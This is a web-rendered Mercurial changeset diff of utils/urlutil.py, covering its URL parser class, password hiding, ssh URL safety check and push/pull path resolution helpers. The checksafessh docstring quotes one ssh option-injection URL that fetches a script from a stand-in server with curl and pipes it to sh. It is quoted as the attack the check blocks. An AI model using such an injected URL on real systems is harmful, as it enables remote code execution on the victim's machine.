##// END OF EJS Templates
urlutil: remove usage of `ui.expandpath` in `get_unique_pull_path`...
marmoute -
r47725:0d8541e5 default
parent child Browse files
Show More
@@ -1,762 +1,776
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Return the port for a given network service.

    If port is an integer (or a string holding only digits), its integer
    value is returned. Otherwise it is treated as a service name and looked
    up using socket.getservbyname(). If there's no matching service,
    error.Abort is raised.
    """
    # Fast path: anything int() can parse is already a port number.
    try:
        return int(port)
    except ValueError:
        pass

    # Not numeric: treat it as a service name such as "http".
    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )
51
51
52
52
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in user/passwd, and in path/fragment
    _safechars = b"!~*'()+"
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new url object carrying the same components as this one."""
        # The constructor argument is a throwaway: every attribute set by
        # __init__ is overwritten below.
        u = url(b'temporary useless value')
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        u.port = self.port
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        # Only components that are not None are listed.
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Local paths (and bundle: paths) are emitted without any quoting.
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # bracketed (IPv6) hosts are emitted verbatim
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url, authdata)`` with credentials split out of the URL.

        ``url`` is this URL rendered without user and password. ``authdata``
        is None when there is no user, otherwise the tuple
        ``(None, (url, host), user, passwd)`` where a missing password is
        replaced by ``b''``.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily blank the credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Tell whether this URL is absolute (remote, drive, UNC or '/')."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the filesystem path for file:/bundle: URLs.

        For any other URL the string originally given to the constructor is
        returned unchanged.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
396
396
397
397
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether parsing ``path`` as a url yields a non-empty scheme."""
    return bool(url(path).scheme)  # cast to help pytype
401
401
402
402
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` starts with a letter followed by a colon.

    Empty or None input yields False.
    """
    # One-byte slices keep the comparison bytes-to-bytes (indexing bytes
    # would give an int) and never raise on short input.
    return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
406
407
407
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path for ``path``, keeping '?' and '#' in the path.

    Query and fragment parsing are both disabled, so those characters are
    treated as ordinary path characters.
    """
    return url(path, parsequery=False, parsefragment=False).localpath()
411
411
412
412
def checksafessh(path):
    # type: (bytes) -> None
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # Unquote first so a percent-encoded leading '-' is caught as well.
    path = urlreq.unquote(path)
    if path.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
        )
429
429
430
430
def hidepassword(u):
    # type: (bytes) -> bytes
    '''hide user credential in a url string

    A non-empty password is replaced by ``***``; everything else is
    re-serialized from the parsed url.
    '''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
438
438
439
439
def removeauth(u):
    # type: (bytes) -> bytes
    '''remove all authentication information from a url string

    Both the user and the password are dropped before re-serializing.
    '''
    parsed = url(u)
    parsed.user = parsed.passwd = None
    return bytes(parsed)
446
446
447
447
def get_push_paths(repo, ui, dests):
    """yields all the `path` selected as push destination by `dests`

    When `dests` is empty, the `default-push` entry of `ui.paths` is used,
    falling back to `default`; error.ConfigError is raised if neither is
    configured. Otherwise each entry of `dests` is resolved through
    `ui.getpath`.
    """
    if not dests:
        if b'default-push' in ui.paths:
            yield ui.paths[b'default-push']
        elif b'default' in ui.paths:
            yield ui.paths[b'default']
        else:
            raise error.ConfigError(
                _(b'default repository not configured!'),
                hint=_(b"see 'hg help config.paths'"),
            )
    else:
        for dest in dests:
            yield ui.getpath(dest)
463
463
464
464
def get_pull_paths(repo, ui, sources, default_branches=()):
    """yields all the `(path, branch)` selected as pull source by `sources`

    An empty `sources` means the `default` path. Each source is looked up in
    `ui.paths` first; unknown names are resolved as a local path or URI and,
    failing that, passed through unchanged.
    """
    if not sources:
        sources = [b'default']
    for source in sources:
        if source in ui.paths:
            loc = ui.paths[source].rawloc
        else:
            # Try to resolve as a local path or URI.
            try:
                # we pass the ui instance as warnings might need to be issued
                loc = path(ui, None, rawloc=source).rawloc
            except ValueError:
                loc = source
        yield parseurl(loc, default_branches)
480
480
481
481
def get_unique_push_path(action, repo, ui, dest=None):
    """return a unique `path` or abort if multiple are found

    This is useful for command and action that does not support multiple
    destination (yet).

    Note that for now, we cannot get multiple destination so this function is
    "trivial".

    The `action` parameter will be used for the error message.
    """
    if dest is None:
        dests = []
    else:
        dests = [dest]
    dests = list(get_push_paths(repo, ui, dests))
    # Explicit abort rather than `assert`: assertions are stripped under -O
    # and would not produce the error message promised above.
    if len(dests) != 1:
        if dest is None:
            msg = _(
                b"default path points to %d urls while %s only supports one"
            )
            msg %= (len(dests), action)
        else:
            msg = _(b"path points to %d urls while %s only supports one: %s")
            msg %= (len(dests), action, dest)
        raise error.Abort(msg)
    return dests[0]
499
499
500
500
def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
    """return a unique `(path, branch)` for the pull source `source`

    This is useful for command and action that does not support multiple
    sources (yet).

    Note that for now, we cannot get multiple sources so this function is
    "trivial".

    The `action` parameter is currently unused; it is intended for the error
    message.
    """
    if source is None:
        if b'default' in ui.paths:
            loc = ui.paths[b'default'].rawloc
        else:
            # XXX this is the historical default behavior, but that is not
            # great, consider breaking BC on this.
            loc = b'default'
    else:
        if source in ui.paths:
            loc = ui.paths[source].rawloc
        else:
            # Try to resolve as a local path or URI.
            try:
                # we pass the ui instance as warnings might need to be issued
                loc = path(ui, None, rawloc=source).rawloc
            except ValueError:
                loc = source
    return parseurl(loc, default_branches)
515
529
516
530
def get_clone_path(ui, source, default_branches=()):
    """return the `(origsource, path, branch)` selected as clone source

    `origsource` is `source` as expanded by `ui.expandpath`; `path` and
    `branch` come from parsing that expanded value.
    """
    origsource = ui.expandpath(source)
    clonepath, branch = parseurl(origsource, default_branches)
    return origsource, clonepath, branch
522
536
523
537
def parseurl(path, branches=None):
    '''parse url#branch, returning (url, (branch, branches))

    A non-empty fragment becomes `branch` and is stripped from the returned
    url. `branches` is passed through, with a falsy value replaced by an
    empty list.
    '''
    u = url(path)
    branch = None
    if u.fragment:
        branch = u.fragment
        u.fragment = None
    return bytes(u), (branch, branches or [])
532
546
533
547
class paths(dict):
    """Mapping of symbolic names to the ``path`` objects they designate.

    The content is initially derived from the ``paths`` config section of
    the ``ui`` instance given to the constructor.
    """

    def __init__(self, ui):
        """Build one ``path`` per non-empty entry of the ``paths`` section."""
        dict.__init__(self)

        for name, location in ui.configitems(b'paths', ignoresub=True):
            # An entry without location is the same as a missing entry.
            if location:
                location, sub_opts = ui.configsuboptions(b'paths', name)
                self[name] = path(
                    ui, name, rawloc=location, suboptions=sub_opts
                )

        # every entry gets its `chain_path` step, in sorted name order
        for _name, entry in sorted(self.items()):
            entry.chain_path(ui, self)

    def getpath(self, ui, name, default=None):
        """Return a ``path`` from a string, falling back to default.

        ``name`` can be a named path or a location. Locations are filesystem
        paths or URIs.

        When ``name`` is None, ``default`` (a single name, or a tuple/list of
        names) is searched in order and the first registered entry is
        returned; None is returned when nothing matches.

        None is also returned for any other false ``name`` (most likely an
        empty string).

        Otherwise the registered entry for ``name`` is returned. If there is
        none, a nameless ``path`` is built from ``name``, and
        ``error.RepoError`` is raised when that construction fails with
        ``ValueError``.
        """
        # Only fall back to default if no path was requested.
        if name is None:
            if not default:
                candidates = ()
            elif isinstance(default, (tuple, list)):
                candidates = default
            else:
                candidates = (default,)
            for candidate in candidates:
                try:
                    return self[candidate]
                except KeyError:
                    pass
            return None

        # Most likely empty string.
        # This may need to raise in the future.
        if not name:
            return None

        try:
            return self[name]
        except KeyError:
            # Not a registered name, try it as a local path or URI.
            try:
                # we pass the ui instance as warnings might need to be issued
                return path(ui, None, rawloc=name)
            except ValueError:
                msg = _(b'repository %s does not exist') % name
                raise error.RepoError(msg)
590
604
591
605
# Registry of the declared path sub-options:
#   sub-option name -> (attribute name, processing function)
_pathsuboptions = {}


def pathsuboption(option, attr):
    """Decorator used to declare a path sub-option.

    ``option`` is the name of the sub-option and ``attr`` the name of the
    attribute it should set on ``path`` instances.

    The decorated function is called with a ``ui`` instance, the ``path``
    instance and the value of the option from the config. Whatever it
    returns is the value set on the ``path`` instance, which makes it the
    place to verify a sub-option or to change its type.

    The decorated function itself is returned unchanged.
    """

    def register(func):
        entry = (attr, func)
        _pathsuboptions[option] = entry
        return func

    return register
615
629
616
630
@pathsuboption(b'pushurl', b'pushloc')
def pushurlpathoption(ui, path, value):
    """Process the ``pushurl`` sub-option of ``path``.

    A value without a scheme is rejected: a warning is issued and None is
    returned. A ``#fragment`` is not supported either: a warning is issued
    and the fragment is dropped. The resulting url is returned as bytes.
    """
    parsed = url(value)

    # Actually require a URL.
    if not parsed.scheme:
        msg = _(b'(paths.%s:pushurl not a URL; ignoring)\n')
        ui.warn(msg % path.name)
        return None

    # The #foo syntax is not supported in the push URL to declare the
    # branch to push.
    if parsed.fragment:
        msg = _(
            b'("#fragment" in paths.%s:pushurl not supported; '
            b'ignoring)\n'
        )
        ui.warn(msg % path.name)
        parsed.fragment = None

    return bytes(parsed)
638
652
639
653
@pathsuboption(b'pushrev', b'pushrev')
def pushrevpathoption(ui, path, value):
    """Process the ``pushrev`` sub-option: the value is used unchanged."""
    return value
643
657
644
658
class path(object):
    """Represents an individual path and its configuration."""

    def __init__(self, ui, name, rawloc=None, suboptions=None):
        """Construct a path from its config options.

        ``ui`` is the ``ui`` instance the path is coming from.
        ``name`` is the symbolic name of the path.
        ``rawloc`` is the raw location, as defined in the config.
        ``suboptions`` is an optional dict of sub-options specific to this
        path; they take precedence over the ones read from ``paths.*``.

        If ``name`` is not defined, we require that the location be a) a local
        filesystem path with a .hg directory or b) a URL. If not,
        ``ValueError`` is raised. ``ValueError`` is also raised when
        ``rawloc`` is empty.
        """
        if not rawloc:
            raise ValueError(b'rawloc must be defined')

        # Locations may define branches via syntax <base>#<branch>.
        parsed = url(rawloc)
        branch = parsed.fragment or None
        if branch is not None:
            parsed.fragment = None

        self.url = parsed
        # the url from the config/command line before dealing with `path://`
        self.raw_url = parsed.copy()
        self.branch = branch

        self.name = name
        self.rawloc = rawloc
        self.loc = b'%s' % parsed

        self._validate_path()

        # `paths.*` sub-options are the base, the path's own ones win
        _unused, merged = ui.configsuboptions(b'paths', b'*')
        if suboptions is None:
            own = {}
        else:
            own = suboptions.copy()
            merged.update(suboptions)
        self._own_sub_opts = own
        self._all_sub_opts = merged.copy()

        self._apply_suboptions(ui, merged)

    def chain_path(self, ui, paths):
        """Resolve a ``path://<name>`` location using the ``paths`` mapping.

        Nothing happens unless the scheme of this path is ``path``. When it
        is, the url, location, and (unless one is set here) branch of the
        referenced entry are adopted, and the sub-options are re-applied,
        the ones of this path taking precedence over the referenced ones.

        ``error.Abort`` is raised if the referenced name is unknown or is
        itself defined as a ``path://``.
        """
        if self.url.scheme != b'path':
            return

        assert self.url.path is None
        target = self.url.host
        try:
            subpath = paths[target]
        except KeyError:
            msg = _(b'cannot use `%s`, "%s" is not a known path')
            raise error.Abort(msg % (self.rawloc, target))
        if subpath.raw_url.scheme == b'path':
            msg = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
            raise error.Abort(msg % (self.rawloc, target))

        self.url = subpath.url
        self.loc = subpath.loc
        if self.branch is None:
            self.rawloc = subpath.rawloc
            self.branch = subpath.branch
        else:
            # keep our own branch, on top of the referenced location
            base = subpath.rawloc.rsplit(b'#', 1)[0]
            self.rawloc = b'%s#%s' % (base, self.branch)

        combined = subpath._all_sub_opts.copy()
        combined.update(self._own_sub_opts)
        self._apply_suboptions(ui, combined)

    def _validate_path(self):
        """Raise ``ValueError`` for a nameless path with an invalid location.

        A path with a symbolic name or with a url scheme is always accepted;
        any other one must pass ``_isvalidlocalpath``.
        """
        if self.name or self.url.scheme:
            return
        if self._isvalidlocalpath(self.loc):
            return
        raise ValueError(
            b'location is not a URL or path to a local '
            b'repo: %s' % self.rawloc
        )

    def _apply_suboptions(self, ui, sub_options):
        """Set the attribute of every registered sub-option on this path.

        If a sub-option is registered, its attribute will always be present.
        The value is None when ``sub_options`` has no entry for it, and is
        the result of the registered function otherwise.
        """
        for option, (attr, convert) in pycompat.iteritems(_pathsuboptions):
            if option in sub_options:
                value = convert(ui, self, sub_options[option])
            else:
                value = None
            setattr(self, attr, value)

    def _isvalidlocalpath(self, path):
        """Returns True if the given path is a potentially valid repository.

        This is its own function so that extensions can change the definition
        of 'valid' in this case (like when pulling from a git repo into a hg
        one)."""
        try:
            hgdir = os.path.join(path, b'.hg')
            found = os.path.isdir(hgdir)
        # Python 2 may return TypeError. Python 3, ValueError.
        except (TypeError, ValueError):
            return False
        return found

    @property
    def suboptions(self):
        """Return sub-options and their values for this path.

        Only the sub-options whose attribute is not None are included.

        This is intended to be used for presentation purposes.
        """
        pairs = (
            (subopt, getattr(self, attr))
            for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions)
        )
        return {subopt: value for subopt, value in pairs if value is not None}
General Comments 0
You need to be logged in to leave comments. Login now